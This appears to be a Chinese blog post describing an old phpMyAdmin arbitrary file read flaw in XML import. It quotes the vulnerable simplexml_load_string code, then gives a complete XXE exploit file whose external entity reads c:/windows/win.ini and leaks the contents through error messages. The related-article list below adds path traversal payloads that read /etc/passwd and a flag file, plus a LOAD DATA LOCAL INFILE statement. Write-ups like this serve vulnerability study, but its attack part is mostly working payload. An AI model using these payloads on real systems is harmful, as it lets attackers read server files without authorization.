PhpMyadmin任意文件读取漏洞

最新推荐文章于 2024-01-26 08:46:38 发布
最新推荐文章于 2024-01-26 08:46:38 发布
阅读量5.7k 收藏
点赞数
文章标签: phpmyadmin structure database xml collation performance
本文介绍如何使用PHP加载XML字符串,并演示了一个构造不完整的XML文件导致的安全风险。重点讨论了使用`LIBXML_COMPACT`选项进行性能优化,同时提供了一个实际的XML导入示例,展示了如何通过导入精心构造的XML文件来读取和写入数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

libraries/import/xml.php中

unset($data);



/**

 * Load the XML string

 *

 * The option LIBXML_COMPACT is specified because it can

 * result in increased performance without the need to

 * alter the code in any way. It's basically a freebee.

 */

$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);

unset($buffer);



/**

 * The XML was malformed

 */

if ($xml === FALSE) {



可以使用系统中的import功能导入一个精心构造的xml文件

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">

]>

<!--

- phpMyAdmin XML Dump

- version 3.4.4

- http://www.phpmyadmin.net

-

- 主机: localhost

- 生成日期: 2011 年 11 月 01 日 14:56

- 服务器版本: 5.1.28

- PHP 版本: 5.2.6

-->



<pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">

    <!--

    - Structure schemas

    -->

    <pma:structure_schemas>

        <pma:database name="test" collation="utf8_general_ci" charset="utf8">

            <pma:table name="ts_ad">

                &hi80sec;

            </pma:table>

        </pma:database>

    </pma:structure_schemas>



    <!--

    - 数据库: 'thinksns'

    -->

    <database name="thinksns">

        <!-- 表 ts_ad -->

    </database>

</pma_xml_export>


来读写文件,系统错误信息会直接显示出文件内容

cnbird2008
关注
致远OA wpsAssistServlet任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
10-31 1349
致远互联oa办公自动化软件系统,实现企业审批/报销/门户/公文/文档/采购/费用等综合管理,致远互联oa办公自动化软件系统,满足企业一体化办公需求。该系统wpsAssistServlet存在任意文件读取漏洞
[CVE-2014-8959] phpmyadmin任意文件包含漏洞分析(图文)
ai_64的博客
05-09 2267
0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发,这个漏洞有些年头了,看离别歌大佬的博文,感觉有点意思,找来实践一下。 任意文件包含漏洞(CVE-2014-8959)影响版本为4.0.1-4.2.12: 0x02 补丁分析 在文件libraries/gis/pma_gis_factory.php中对$type_lower多加了个判断。 作者...
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意件读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 451
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
漏洞复现】phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
weixin_47443077的博客
06-06 683
漏洞复现】phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433) 0x01漏洞背景 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 0x02漏洞环境 vulhub的docker环境搭建 在/home/vulhub/phpmyadmin/WooYun-2016-199433目录下执行如下命令启动phpmyadmin: docker-compose up -d 查看开启的端口为8080 环
[WEB安全]phpMyadmin后台任意文件包含漏洞分析(CVE-2018-12613)
baguangman5501的博客
09-02 511
0x00 简介 影响版本:4.8.0——4.8.1 本次实验采用版本:4.8.1 0x01 效果展示 payload: http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 0x02 漏洞分析 漏洞产生点位于:index.php文件54—67行 可以看到如果要包...
Mysql任意文件读取漏洞
神隐哥的博客
03-02 1142
实现原理: 攻击者搭建一个伪造的mysql服务器,当有用户去连接上这个伪造的服务器时。 攻击者就可以任意读取受害者的文件内容。 具体可以去看下Mysql连接时的流量。会有一个load_file命令。因为我们是服务端。可以自定义这个命令。就实现了任意文件读取。 具体原理参考:https://cloud.tencent.com/developer/article/1426503实验一 用到的工具:https://github.com/allyshka/Rogue-MySql-Server.git 这里用到两台
任意文件读取与下载漏洞学习
不想当脚本小子的脚本小子
01-25 4147
原理: 在web安全中,任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义,就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数,文件包含参数。主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。 任意文件读取漏洞的原理其实就是由于程..
渗透测试中遇到的Adminer任意文件读取漏洞
网安君的博客
01-17 7348
在某次做项目的时候遇到一个mysql.php,打开发现是adminer,网上搜到任意文件读取复现的时候,用了网上很多的python脚本都无法运行起来(例如:https://github.com/allyshka/Rogue-MySql-Server)。在GitHub找到一个可以运行的脚本,原理是模拟mysql的运行。
可用的PHPmyadmin2.9.0.3
12-07
自己亲自测试可以用,也是一直用的2.9版本,需要用的可以下载使用,有问题的话可以留言
多级XML读取 tinyXML的使用
05-12
C++ 语言 用tinyxml读取XML文件的内容 <pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/"> <database name="dsxiong"> <!-- 表 jw_region --> <table name="jw_region"> <column name="region_id">1</column> <column name="parent_id">0</column> <column name="region_name">中国</column> <column name="region_type">0</column> <column name="agency_id">0</column> </table> <table name="jw_region"> <column name="region_id">2</column> <column name="parent_id">1</column> <column name="region_name">北京</column> <column name="region_type">1</column> <column name="agency_id">0</column> </table> </database> </pma_xml_export>
mysql 任意文件读取漏洞_Adminer任意文件读取漏洞
weixin_33918358的博客
02-07 2630
软件简介官方网站:https://www.adminer.org/Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdmin的MySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。漏洞原理Adminer任意文件读取漏洞其实来源于MySQL“LOAD DAT...
mssql 数据导成文件_Adminer4.6.2任意文件读取漏洞
weixin_39866741的博客
12-16 783
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类...
phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞(测试)
cj_Hydra's Blog
04-23 1850
前言: 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;,从而可以导致my...
phpMyAdmin 2.x版本任意文件读取
网络安全。
01-18 954
0x01 简介 phpmyadmin scripts/setup.php 页面存在反序列化漏洞(WooYun-2016-199433) phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 0x02 漏洞复现 POST /scripts/setup.php HTTP/1.1 Host: ip:8080 User-Agent: Mozilla/5...
phpmyadmin 无法读取文件
weixin_34252686的博客
04-17 167
为什么80%的码农都做不了架构师?>>> ...
GWCTF 2019]我有一个数据库 phpmyadmin任意文件读取
shannidawang的博客
09-25 448
phpmyadmin任意文件读取 进入phpmyadmin phpmyadmin4.8.0-4.8.1存在文件包含漏洞 直接上payload读取passwd文件 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 读取成功,尝试读取flag文件 /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag ...
phpmyadmin-文件包含漏洞代码审计过程(超详细)
最新发布
qq_59020256的博客
01-26 1699
phpmyadmin-文件包含漏洞
Adminer 4.6.2任意文件读取漏洞详解:防范与利用
Adminer≤4.6.2版本存在一个严重的任意文件读取漏洞,该漏洞主要源于MySQL的LOADDATAINFILE功能。Adminer是一个轻量级的Web端数据库管理工具,支持多种主流数据库如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,类似...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值